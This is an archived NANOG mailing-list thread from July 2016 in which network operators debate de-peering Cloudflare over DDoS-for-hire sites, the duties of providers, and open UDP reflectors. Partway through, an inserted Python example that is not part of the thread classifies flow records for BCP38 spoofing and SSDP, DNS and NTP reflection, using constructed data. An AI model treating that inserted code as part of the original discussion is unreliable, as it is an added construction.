>
> --
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
> J. Oquendo
> SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM
>
> "Where ignorance is our master, there is no possibility of
> real peace" - Dalai Lama

Re: Cloudflare, dirty networks and politricks

2016-07-29 Thread J. Oquendo
On Fri, 29 Jul 2016, Rich Kulawiec wrote:

> On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
> > If we want to be accurate about it, Cloudflare doesn’t host the DDoS,
> > they protect the website of seller of the product. We shouldn’t be
> > de-peering Cloud Flare over sites they protect any more than we would
> > de-peer GoDaddy over sites they host, some of which, no doubt, sell
> > gray/black market/illegal items/services.
> 
> The only way to make action against them effective is to do it broadly,
> do it swiftly, and do it permanently.
> 

In my ramblings on "Why network operators love filth", I
associate a landlord that knowingly allows his/her tenant
to sell drugs. In America, your house is gone. This should
be the case on the Internet as well. Keep sending out crap
and ARIN should yank your IP space after everyone else
has de-peered you.

So let's get to these horrible analogies of "weapons" and
whether or not CloudFlare is solely the gun manufacturer
and is not responsible whether or not their ARCLOUD rifle
was used to shoot up a school killing children.

Analogy: Hotel Cloud is a pretty big hotel in the city.
They have 5,000 rooms. When you walk by, their tenants
are throwing rocks out of the windows, garbage, etc.
People complain to the hotel management that does nothing
about it. Hotel Cloud's response is: 'Well this is really
not our problem, we only rent a room, what the occupant
does...' --- And this makes sense to how many of you who'd
respond: "Well I don't know about you but I want to walk
around freely" Freely? At some point in time, you WILL
walk by this hotel, or another that WILL become just like
it. Why? Because there will be no one to say: "Hey this
is wrong buck stops here..."

I have seen these discussions on this list for so many
years, and there are those that want to do good, but won't
lift a finger out of fear of the herd/praetorian guard.
Anyone saying it cannot be done, is a coward bowing to
the dollar (euro/yen/whatever). The analogy above is spot
on, with the only difference being a hotel is physical,
and on the Interwebs, out of sight out of mind. This is
until one of your relatives' sites gets taken offline by
some bored moron via DDoS, and there go their sales, there
goes their business. THEN and only THEN will some of the
naysayers say: "Shit we could have stopped it."

Do you need law enforcement to be moral? "I can see
that person is getting pulverized by some drunken idiot
better not intervene because well... I want to walk
freely..." That beating can come full circle, where
beating can be DDoS, a sophisticated attack, malware.

I am so tempted to start a shaming site for networks
including all of the big boys with detailed records
showing how abuse was contacted, no one did nothing,
and oh by the way... "Are you sure you want to host
or transit with this company? Last I checked via
logs, they were a filthy network that catered to
peds, RBN folk, etc" Maybe when some of you guys
(that sit around twiddling fingers) see your companies
all over the place, maybe then you'll think about doing
the right thing.


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama

0B23 595C F07C 6092 8AEB  074B FC83 7AF5 9D8A 4463
https://pgp.mit.edu/pks/lookup?op=get=0xFC837AF59D8A4463


Re: Cloudflare, dirty networks and politricks

2016-07-29 Thread Rich Kulawiec
On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
> If we want to be accurate about it, Cloudflare doesn’t host the DDoS,
> they protect the website of seller of the product. We shouldn’t be
> de-peering Cloud Flare over sites they protect any more than we would
> de-peer GoDaddy over sites they host, some of which, no doubt, sell
> gray/black market/illegal items/services.

This strategy fails for two reasons.

First, nobody gets a pass.  Anybody providing services to abusers
needs to cut them off, whether it's a registrar, a web host, an email
provider, a DNS provider, or anything else.  Nobody gets to shrug it
off with "Well, but..."

Second, nobody *can* get a pass, because the people behind these operations
have long since learned to distribute their assets widely -- in an attempt
to avoid exactly the actions in the first point.  And you know what?
It works.  "We're just hosting their email", says X, and "We're just
hosting their DNS", says Y, and "We're just hosting their web site",
says Z, and none of them do anything, and nothing gets done. 

The only way to make action against them effective is to do it broadly,
do it swiftly, and do it permanently.

---rsk


Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread Ca By
On Thursday, July 28, 2016, Dovid Bender <do...@telecurve.com> wrote:

> The issue is that Cloudflare in a way is generating their own market. If
> the ddos sites weren't protected by Cloudflare they would eat each other
> alive. It's in their interest that their sites stay up so there is a need
> for their service. When GoDaddy hosts a bad site they aren't causing
> customer to sign up for the exact service for the protection they need from
> the bad site.
>
>
>
I feel the same way about all the ddos protection rackets. But I genuinely
feel Cloudflare is just a cdn that got good at fending off ddos just to
stay alive.

And they do a lot of good things with IPv6, dnssec, TLS 1.2++, and open
source. It is not fair to blame them for our (network operators)
negligent open udp amplifiers.

We are the real problems.

If Cloudflare did not host them, someone else would.

Perhaps only on tor.

But once you remove the open dns amplifiers, or put up the appropriate acls
(bcp38 + blocks obviously abused ssdp, dns, ntp to the extent you can),
then you have really taken ddos capacity offline




> Regards,
>
> Dovid
>
> -Original Message-
> From: TR Shaw <ts...@oitc.com>
> Sender: "NANOG" <nanog-boun...@nanog.org>
> Date: Thu, 28 Jul 2016 19:45:14
> To: Donn Lasher<d.las...@f5.com>
> Cc: nanog@nanog.org<nanog@nanog.org>
> Subject: Re: Cloudflare, dirty networks and politricks
>
>
> > On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG <nanog@nanog.org> wrote:
> >
> > On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo"
> > <nanog-boun...@nanog.org on behalf of joque...@e-fensive.net> wrote:
> >
> >
> >> While many are chanting: #NetworkLivesMatter, I have yet
> >> to see, read, or hear about any network provider being
> >> the first to set precedence by either de-peering, or
> >> blocking traffic from Cloudflare. There is a lot of
> >> keyboard posturing: "I am mad and I am not going to take
> >> it anymore" hooplah but no one is lifting a finger to
> >> do anything other than regurgitate "I am mad... This is
> >> criminal."
> >
> > (long discussion, was waiting for a place to jump in..)
> >
> > If we want to be accurate about it, Cloudflare doesn’t host the DDoS,
> > they protect the website of seller of the product. We shouldn’t be
> > de-peering Cloud Flare over sites they protect any more than we would
> > de-peer GoDaddy over sites they host, some of which, no doubt, sell
> > gray/black market/illegal items/services.
> >
> > If, on the other hand,  you can find a specific network actually
> > generating the volumes of DDoS, you should have a conversation about
> > de-peering….
> >
> > $0.02…
> >
>
> It would be nice however if Cloudflare would announce their “freebie”
> CIDRs and the IP block that host their paying customers. Most of the abuse
> centers on the free clients.
>
>


Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread Dovid Bender
The issue is that Cloudflare in a way is generating their own market. If the 
ddos sites weren't protected by Cloudflare they would eat each other alive. It's 
in their interest that their sites stay up so there is a need for their 
service. When GoDaddy hosts a bad site they aren't causing customer to sign up 
for the exact service for the protection they need from the bad site.

  
Regards,

Dovid

-Original Message-
From: TR Shaw <ts...@oitc.com>
Sender: "NANOG" <nanog-boun...@nanog.org>
Date: Thu, 28 Jul 2016 19:45:14 
To: Donn Lasher<d.las...@f5.com>
Cc: nanog@nanog.org<nanog@nanog.org>
Subject: Re: Cloudflare, dirty networks and politricks


> On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG <nanog@nanog.org> wrote:
> 
> On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" 
> <nanog-boun...@nanog.org on behalf of joque...@e-fensive.net> wrote:
> 
> 
>> While many are chanting: #NetworkLivesMatter, I have yet
>> to see, read, or hear about any network provider being
>> the first to set precedence by either de-peering, or
>> blocking traffic from Cloudflare. There is a lot of
>> keyboard posturing: "I am mad and I am not going to take
>> it anymore" hooplah but no one is lifting a finger to
>> do anything other than regurgitate "I am mad... This is
>> criminal."
> 
> (long discussion, was waiting for a place to jump in..)
> 
> If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they 
> protect the website of seller of the product. We shouldn’t be de-peering 
> Cloud Flare over sites they protect any more than we would de-peer GoDaddy 
> over sites they host, some of which, no doubt, sell gray/black market/illegal 
> items/services.
> 
> If, on the other hand,  you can find a specific network actually generating 
> the volumes of DDoS, you should have a conversation about de-peering….
> 
> $0.02…
> 

It would be nice however if Cloudflare would announce their “freebie” CIDRs 
and the IP block that host their paying customers. Most of the abuse centers on 
the free clients.



Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread Ca By
On Thursday, July 28, 2016, Donn Lasher via NANOG  wrote:

> On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" <
> nanog-boun...@nanog.org  on behalf of joque...@e-fensive.net
> > wrote:
>
>
> >While many are chanting: #NetworkLivesMatter, I have yet
> >to see, read, or hear about any network provider being
> >the first to set precedence by either de-peering, or
> >blocking traffic from Cloudflare. There is a lot of
> >keyboard posturing: "I am mad and I am not going to take
> >it anymore" hooplah but no one is lifting a finger to
> >do anything other than regurgitate "I am mad... This is
> >criminal."
>
> (long discussion, was waiting for a place to jump in..)
>
> If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they
> protect the website of seller of the product. We shouldn’t be de-peering
> Cloud Flare over sites they protect any more than we would de-peer GoDaddy
> over sites they host, some of which, no doubt, sell gray/black
> market/illegal items/services.
>
> If, on the other hand,  you can find a specific network actually
> generating the volumes of DDoS, you should have a conversation about
> de-peering….
>
> $0.02…
>
>
>
Agreed. Cloudflare is just the messenger

The ddos is coming from your ssdp, dns, and ntp servers. Not Cloudflare.

I see a lot of ddos traffic.

It is always udp

Comcast took a huge step in stemming the ssdp problem in their network,
http://labs.comcast.com/preventing-ssdp-abuse

Thanks Comcast!

But they still host tens of thousands, perhaps more, open dns resolvers
that attack us.
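
The filtering Ca By describes in this message and in his other reply in this thread (BCP38 source validation plus ACLs for abused SSDP, DNS and NTP), as an added example that is not part of the thread: a classifier run over constructed flow records from customer-facing interfaces. The prefixes, interface names, record fields, threshold and function names are all assumptions made for illustration.

```python
import ipaddress
from collections import Counter, defaultdict
from typing import NamedTuple

# UDP services the thread names as abused for reflection.
SSDP_PORT = 1900
REFLECTOR_PORTS = {53: "dns", 123: "ntp"}

# Assumed customer-facing interfaces and the prefixes assigned to each
# (documentation address space only).
CUSTOMER_PREFIXES = {
    "cust-a": ["192.0.2.0/25", "2001:db8:a::/48"],
    "cust-b": ["198.51.100.0/24"],
}
NETS = {iface: [ipaddress.ip_network(p) for p in prefixes]
        for iface, prefixes in CUSTOMER_PREFIXES.items()}

PERMIT, DROP_SPOOFED, DROP_SSDP, FLAG_REFLECTOR = (
    "permit", "drop-spoofed", "drop-ssdp", "flag-reflector")


class Flow(NamedTuple):
    """One flow record seen arriving on a customer-facing interface."""
    in_iface: str
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    nbytes: int


def source_is_valid(in_iface: str, src: str) -> bool:
    """BCP38: the source must lie in a prefix assigned to the interface the
    packet arrived on. Unknown interfaces and bad addresses fail closed."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in NETS.get(in_iface, ()))


def classify(flow: Flow) -> str:
    """Return the verdict for one flow; the spoofing check comes first."""
    if not source_is_valid(flow.in_iface, flow.src):
        return DROP_SPOOFED
    if flow.proto == "udp":
        # SSDP is a LAN discovery protocol, so this example drops it at
        # the provider edge in both directions.
        if SSDP_PORT in (flow.sport, flow.dport):
            return DROP_SSDP
        # DNS and NTP cannot be blocked wholesale. A customer host that
        # answers *from* those ports is only flagged for follow-up: it may
        # be a legitimate server or an open reflector.
        if flow.sport in REFLECTOR_PORTS:
            return FLAG_REFLECTOR
    return PERMIT


def report(flows, min_dsts=3):
    """Count verdicts and list flagged hosts that answered at least
    min_dsts distinct destinations (threshold kept tiny for the sample)."""
    verdicts = Counter()
    dsts = defaultdict(set)
    for flow in flows:
        verdict = classify(flow)
        verdicts[verdict] += 1
        if verdict == FLAG_REFLECTOR:
            dsts[(flow.src, REFLECTOR_PORTS[flow.sport])].add(flow.dst)
    candidates = {k: len(d) for k, d in dsts.items() if len(d) >= min_dsts}
    return verdicts, candidates


# Constructed sample records, not captured traffic.
FLOWS = [
    Flow("cust-a", "udp", "192.0.2.10", 40000, "203.0.113.5", 53, 80),
    Flow("cust-a", "udp", "203.0.113.77", 5353, "198.51.100.9", 123, 60),
    Flow("cust-a", "udp", "192.0.2.200", 41000, "203.0.113.5", 53, 80),
    Flow("cust-b", "udp", "198.51.100.20", 1900, "203.0.113.9", 33000, 3000),
    Flow("cust-b", "udp", "198.51.100.53", 53, "203.0.113.1", 4444, 3500),
    Flow("cust-b", "udp", "198.51.100.53", 53, "203.0.113.2", 4445, 3500),
    Flow("cust-b", "udp", "198.51.100.53", 53, "203.0.113.3", 4446, 3500),
    Flow("cust-b", "udp", "198.51.100.7", 123, "203.0.113.40", 123, 90),
    Flow("cust-a", "tcp", "2001:db8:a::10", 51000, "2001:db8:ffff::1", 443, 1200),
    Flow("cust-a", "udp", "2001:db8:b::1", 123, "2001:db8:ffff::2", 123, 90),
    Flow("cust-z", "udp", "198.51.100.5", 40001, "203.0.113.5", 53, 80),
]

if __name__ == "__main__":
    verdicts, candidates = report(FLOWS)
    for verdict, count in sorted(verdicts.items()):
        print(f"{verdict:15} {count}")
    for (src, service), n in candidates.items():
        print(f"follow up: {src} answered {n} destinations from {service}")
```
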


Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread Owen DeLong

> On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG  wrote:
> 
> On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" 
>  wrote:
> 
> 
>> While many are chanting: #NetworkLivesMatter, I have yet
>> to see, read, or hear about any network provider being
>> the first to set precedence by either de-peering, or
>> blocking traffic from Cloudflare. There is a lot of
>> keyboard posturing: "I am mad and I am not going to take
>> it anymore" hooplah but no one is lifting a finger to
>> do anything other than regurgitate "I am mad... This is
>> criminal."
> 
> (long discussion, was waiting for a place to jump in..)
> 
> If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they 
> protect the website of seller of the product. We shouldn’t be de-peering 
> Cloud Flare over sites they protect any more than we would de-peer GoDaddy 
> over sites they host, some of which, no doubt, sell gray/black market/illegal 
> items/services.
> 
> If, on the other hand,  you can find a specific network actually generating 
> the volumes of DDoS, you should have a conversation about de-peering….
> 
> $0.02…

On one hand, I agree with you… “We should no more de-peer Cloud Flare over 
sites they protect than we would de-peer GoDaddy over sites they host.”

However, if GoDaddy or Cloud Flare consistently refused to take down sites 
which specifically sell malicious activities as a service, I see no reason not 
to consider de-peering either one of them.

I’m not well enough versed in the exact details of the alleged 
actions/non-actions of CF in this scenario, but the idea that we should not 
apply rational peer pressure against the accessible indirect party in favor of 
playing whack-a-mole with the less accessible directly offending party seems 
patently absurd to me.

The actual dDOS is probably not even performed by the company advertising the 
service, but rather by one or more bot-nets that they either directly control 
(pwn, but don’t own) or contract (someone else pwned the machines and sells bot 
services to them).

It’s one thing if a site is advertising legitimate load or stress testing 
abilities and is conducting itself in an ethical manner.

It’s an entirely different matter if the site is advertising their ability to 
carry out malicious attacks for hire (e.g. “We can take down XYZ for mere 
pennies per hour.”, etc.).

In the latter case, I would expect any ethical company that found themselves 
hosting such content to take swift action against such a customer for TOS/AUP 
violation. In the former, there’s likely nothing wrong there and while you may 
not like what they do, it may well be a legitimate service, none-the-less.

Now there is a bit of a grey area which probably merits consideration… What if 
company A runs a web-site. They are a transit customer of company B. Company C 
is the VPS hosting company which is under contract to company D to provide 
machines and bandwidth for their “Security Testing Products.”.

(Quick cheat-diagram to make the rest easier to follow)
[Web Site A] <-> [Transit B] <-> {internet} <-> [VPS Host C] <-> [“Security 
Contractor” D]

Suppose company A dramatically overestimates their needed stress level for a 
traffic test and contracts company D to send them a stress test which turns out 
to overwhelm the peering between B and C.

Clearly, this is problematic to both B and C, but it’s not clear that it’s an 
actual violation or that either A or D has actually done anything wrong, per 
se. I would expect D to cease and desist promptly upon notification from C or 
A. Ideally they would also politely cease and desist upon credible request from 
company B, but the definition of credible is somewhat difficult here and may be 
subjective (B will generally consider themselves credible whether C does or 
not).

The problem may extend further, depending on whether B and C are directly 
peered or are connected via some additional set of transit networks in between. 
(see footnote [1]  for exact definitions of peering and transit intended in 
this message. Short version: packet flow, not money).

Obviously the more transit networks impacted, the more complex the issue 
becomes.

Owen

[1]
peering: The advertising of routes to and acceptance of packets for ones own 
autonomous system(s) and those autonomous systems for which you provide transit.
transit: The advertising of all known routes, default, or some superset of the 
above definition of peering and the willingness to accept, carry, and pass 
along packets destined to other peers and/or transit providers beyond the 
limits set by peering above.




Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread TR Shaw

> On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG  wrote:
> 
> On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" 
>  wrote:
> 
> 
>> While many are chanting: #NetworkLivesMatter, I have yet
>> to see, read, or hear about any network provider being
>> the first to set precedence by either de-peering, or
>> blocking traffic from Cloudflare. There is a lot of
>> keyboard posturing: "I am mad and I am not going to take
>> it anymore" hooplah but no one is lifting a finger to
>> do anything other than regurgitate "I am mad... This is
>> criminal."
> 
> (long discussion, was waiting for a place to jump in..)
> 
> If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they 
> protect the website of seller of the product. We shouldn’t be de-peering 
> Cloud Flare over sites they protect any more than we would de-peer GoDaddy 
> over sites they host, some of which, no doubt, sell gray/black market/illegal 
> items/services.
> 
> If, on the other hand,  you can find a specific network actually generating 
> the volumes of DDoS, you should have a conversation about de-peering….
> 
> $0.02…
> 

It would be nice however if Cloudflare would announce their “freebie” CIDRs 
and the IP block that host their paying customers. Most of the abuse centers on 
the free clients.



Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread Donn Lasher via NANOG
On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo"  wrote:


>While many are chanting: #NetworkLivesMatter, I have yet
>to see, read, or hear about any network provider being
>the first to set precedence by either de-peering, or
>blocking traffic from Cloudflare. There is a lot of
>keyboard posturing: "I am mad and I am not going to take
>it anymore" hooplah but no one is lifting a finger to
>do anything other than regurgitate "I am mad... This is
>criminal."

(long discussion, was waiting for a place to jump in..)

If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they 
protect the website of seller of the product. We shouldn’t be de-peering Cloud 
Flare over sites they protect any more than we would de-peer GoDaddy over sites 
they host, some of which, no doubt, sell gray/black market/illegal 
items/services.

If, on the other hand,  you can find a specific network actually generating the 
volumes of DDoS, you should have a conversation about de-peering….

$0.02…








Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread Seth Mattinen

On 7/28/16 12:01, McDonald Richards wrote:
> Feel free to demonstrate to us all how you're leading by example.
>
> Until then, as a consumer of "the Internet", I'd like my any-to-any access
> to remain that way.

Again, and that's why these problems are such as they are.

~Seth


Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread J. Oquendo
On Thu, 28 Jul 2016, Stephen Satchell wrote:

> Let's suppose someone did indeed de-peer or otherwise block Cloudflare 
> from their entire network.
> 
> Which of y'all would be the first to say to that network operator, "Hope 
> you enjoy your intranet"?

Really? Again more boogeyman nonsense. The world does not
revolve around Cloudflare or any other provider. If I were
a customer, and my customers could not reach me, I would
go to my provider. If I discovered my provider was being
unethical in their practice, I would be an idiot to stay
with them. "Hey its ok for me to conduct eCommerce
transactions. I mean they're only allowing DoS, malware,
ransomware."

Tell me how would that work for you when your clients
started jumping ship because your network is dirty. Again
I go back to square one... The responders ("No you can
never!!!") are those who truly could care less about the
current state of garbage on the net. Masquerading it along
the lines of:

"Ermahgerd WAR!!!"
"OMG YOU WILL ONLY HAVE AN INTRANET"
"You can't be serious!!!"


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama

0B23 595C F07C 6092 8AEB  074B FC83 7AF5 9D8A 4463
https://pgp.mit.edu/pks/lookup?op=get=0xFC837AF59D8A4463


Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread McDonald Richards
Feel free to demonstrate to us all how you're leading by example.

Until then, as a consumer of "the Internet", I'd like my any-to-any access
to remain that way.



On Thu, Jul 28, 2016 at 11:52 AM, Seth Mattinen  wrote:

> On 7/28/16 11:24, McDonald Richards wrote:
>
>> Be sure to let us all know how this works out for your business.
>>
>
>
> And that's why these problems are such as they are.
>
> ~Seth
>


Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread Seth Mattinen

On 7/28/16 11:24, McDonald Richards wrote:
> Be sure to let us all know how this works out for your business.

And that's why these problems are such as they are.

~Seth


Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread Stephen Satchell

On 07/28/2016 10:17 AM, J. Oquendo wrote:
> While many are chanting: #NetworkLivesMatter, I have yet
> to see, read, or hear about any network provider being
> the first to set precedence by either de-peering, or
> blocking traffic from Cloudflare. There is a lot of
> keyboard posturing: "I am mad and I am not going to take
> it anymore" hooplah but no one is lifting a finger to
> do anything other than regurgitate "I am mad... This is
> criminal."

Let's suppose someone did indeed de-peer or otherwise block Cloudflare 
from their entire network.

Which of y'all would be the first to say to that network operator, "Hope 
you enjoy your intranet"?


Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread J. Oquendo
On Thu, 28 Jul 2016, McDonald Richards wrote:

> Be sure to let us all know how this works out for your business.
> 
> On Thu, Jul 28, 2016 at 10:35 AM, J. Oquendo  wrote:
> 

As stated... "Networkers don't give a rats ass about
ethics/morals. Solely a fistful of dollars"

In the interim, this conversation differs little from
fergdawg's "How to Handle ISPs Who Turn a Blind Eye to
Criminal Activity?"

https://www.nanog.org/mailinglist/mailarchives/old_archive/2007-10/msg00348.html

Back to what matters now... Money, because cybercrime meh.

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama

0B23 595C F07C 6092 8AEB  074B FC83 7AF5 9D8A 4463
https://pgp.mit.edu/pks/lookup?op=get=0xFC837AF59D8A4463


Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread McDonald Richards
Be sure to let us all know how this works out for your business.

On Thu, Jul 28, 2016 at 10:35 AM, J. Oquendo  wrote:

> On Thu, 28 Jul 2016, Naslund, Steve wrote:
>
> > You obviously have a much shorter Internet memory than some of the
> engineers on here that have had a long history of killing off and
> blacklisting various spam and malware operations over the years.  I think
> the one thing that has changed is that the service providers are now large
> corporate entities that do not take going to war with each other as lightly
> as we did back in the day.
> >
> > Steven Naslund
> > Chicago IL
>
> It is this same attitude that throws everything into the
> loop we are seeing: "Well Mega Corporation is allowing it
> and we can't stop them lest we want to go to war with
> them." Define war. What will they do if you de-peer? They
> will find another provider to peer with it. That is it.
> There is no "war" no one is coming to our offices in full
> military gear. The more you guys allow this, the more it
> will continue.
>
> Start de-peering companies similar to BGP Dampening. "Oh
> didn't respond to our Nthousandth abuse. De-peered for N
> amount of time. Increment the time, and when some of these
> providers start seeing the cost of associating with these
> types of crimes (spam, malware), they have a choice, ship
> in or ship out. If ALL PROVIDERS did the same, who would
> a dirty host have left to peer with?
>
> Any other answer is nonsense and an excuse... "This will
> start a war!!!" Nonsense and quite possibly the sorriest
> excuse I have read for lifting a finger. 100 more people
> with the same response, means nothing will ever get done.
> OTOH ... Let's go back to "OMG THIS HAS TO STOP BUT I AM
> NOT GOING TO BE THE ONE LIFTING A FINGER!!! Because...
> ERMAHGERD WAR"
>
>
>
> --
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
> J. Oquendo
> SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM
>
> "Where ignorance is our master, there is no possibility of
> real peace" - Dalai Lama
>
> 0B23 595C F07C 6092 8AEB  074B FC83 7AF5 9D8A 4463
> https://pgp.mit.edu/pks/lookup?op=get=0xFC837AF59D8A4463
>


Re: Cloudflare, dirty networks and politricks

2016-07-28 Thread J. Oquendo
On Thu, 28 Jul 2016, Naslund, Steve wrote:

> You obviously have a much shorter Internet memory than some of the engineers 
> on here that have had a long history of killing off and blacklisting various 
> spam and malware operations over the years.  I think the one thing that has 
> changed is that the service providers are now large corporate entities that 
> do not take going to war with each other as lightly as we did back in the day.
> 
> Steven Naslund
> Chicago IL

It is this same attitude that throws everything into the
loop we are seeing: "Well Mega Corporation is allowing it
and we can't stop them lest we want to go to war with
them." Define war. What will they do if you de-peer? They
will find another provider to peer with it. That is it.
There is no "war" no one is coming to our offices in full
military gear. The more you guys allow this, the more it
will continue.

Start de-peering companies similar to BGP Dampening. "Oh
didn't respond to our Nthousandth abuse. De-peered for N
amount of time. Increment the time, and when some of these
providers start seeing the cost of associating with these
types of crimes (spam, malware), they have a choice, ship
in or ship out. If ALL PROVIDERS did the same, who would
a dirty host have left to peer with?

Any other answer is nonsense and an excuse... "This will
start a war!!!" Nonsense and quite possibly the sorriest
excuse I have read for lifting a finger. 100 more people
with the same response, means nothing will ever get done.
OTOH ... Let's go back to "OMG THIS HAS TO STOP BUT I AM
NOT GOING TO BE THE ONE LIFTING A FINGER!!! Because...
ERMAHGERD WAR"



-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama

0B23 595C F07C 6092 8AEB  074B FC83 7AF5 9D8A 4463
https://pgp.mit.edu/pks/lookup?op=get=0xFC837AF59D8A4463


RE: Cloudflare, dirty networks and politricks

2016-07-28 Thread Naslund, Steve
You obviously have a much shorter Internet memory than some of the engineers on 
here that have had a long history of killing off and blacklisting various spam 
and malware operations over the years.  I think the one thing that has changed 
is that the service providers are now large corporate entities that do not take 
going to war with each other as lightly as we did back in the day.

Steven Naslund
Chicago IL

>-----Original Message-----
>From: J. Oquendo [mailto:joque...@e-fensive.net] 
>Sent: Thursday, July 28, 2016 12:17 PM
>To: Phil Rosenthal
>Cc: Naslund, Steve; nanog@nanog.org
>Subject: Cloudflare, dirty networks and politricks
>
>
>While many are chanting: #NetworkLivesMatter, I have yet to see, read, or hear 
>about any network provider being the first to set precedent by either 
>de-peering, or blocking traffic from Cloudflare. There is a lot of keyboard 
>posturing: "I am mad and I am not going to take it anymore" hoopla but no 
>one is lifting a finger to do anything other than regurgitate "I am mad... 
>This is criminal."
>
>Government in the US is not going to get involved as the financial cost won't 
>warrant an investigation. Would you spend $100 to tow a car worth $1? 
>Cloudflare, Amazon, Rackspace, and countless others are, and have been 
>allowing the same thing since the dawn of their creation and network 
>operators... Shame on you for allowing it.
>
>It is legal? Is it moral? Does it serve a real world benefit? (booters). Let's 
>get real these booters serve little purpose. Anyone can go back to romper room 
>and do the simple math: I have a 100mb pipe, if someone sends me 200mb will 
>it flood me? A pre-schooler can give anyone the answer. Yet here is everyone 
>chiming in on legal matters when not one respondent that I have seen is a 
>lawyer.
>
>I wrote about this in my rambling which is linked in the NANOG LinkedIn group: 
>"Why Do Networking Providers Like Cybercriminals So Much" and the responses I 
>have read on this thread, make me believe it more so. Networking operators 
>could give a rat's ass about doing anything about DDoS, viruses, etc., since 
>it is a source of revenue down the daisy chain. Like it or not. I would be 
>surprised if ANYONE in this NOG, or any other "NOG" de-peered out of 
>principle. With that said, I don't even know why this thread is being 
>continued. 
>
>
>--
>=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>J. Oquendo
>SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM